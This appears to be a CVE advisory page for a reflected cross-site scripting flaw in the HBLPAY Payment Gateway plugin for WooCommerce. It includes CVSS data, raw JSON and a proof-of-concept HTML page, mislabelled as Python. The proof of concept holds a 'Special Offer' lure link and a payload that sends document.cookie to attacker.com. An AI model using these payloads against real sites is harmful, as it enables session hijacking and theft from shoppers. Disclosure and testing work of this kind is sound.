Security Vulnerability Report
中文
CVE-2025-14875 CVSS 6.1 MEDIUM

CVE-2025-14875

Published: 2026-01-07 12:16:57
Last Modified: 2026-04-15 00:35:42

Description

The HBLPAY Payment Gateway for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘cusdata’ parameter in all versions up to, and including, 5.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

HBLPAY Payment Gateway for WooCommerce <= 5.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-14875 PoC - Reflected XSS via cusdata parameter --> <!-- Attack Scenario: Trick user into clicking malicious link --> <!-- Malicious URL Example --> <!-- https://vulnerable-site.com/?page_id=XXX&cusdata=<script>alert(document.domain)</script> --> <!DOCTYPE html> <html> <head> <title>CVE-2025-14875 PoC</title> </head> <body> <h2>CVE-2025-14875 - HBLPAY WooCommerce XSS PoC</h2> <p>Malicious Link (click to test XSS):</p> <a href="http://target-site.com/?page_id=123&cusdata=<script>alert('XSS Vulnerable - CVE-2025-14875')</script>" target="_blank"> Click Here for Special Offer </a> <p>Cookie Stealing Payload:</p> <code>?cusdata=<script>document.location='https://attacker.com/steal?c='+document.cookie</script></code> <p>Key Points:</p> <ul> <li>Target: HBLPAY Payment Gateway for WooCommerce <= 5.0.0</li> <li>Parameter: cusdata (GET)</li> <li>No authentication required</li> <li>Requires user interaction (social engineering)</li> </ul> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14875", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:16:57.327", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The HBLPAY Payment Gateway for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘cusdata’ parameter in all versions up to, and including, 5.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3438316/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/06362518-f2ee-485f-9e0e-1b1ada9c72db?source=cve", "source": "[email protected]"}]}}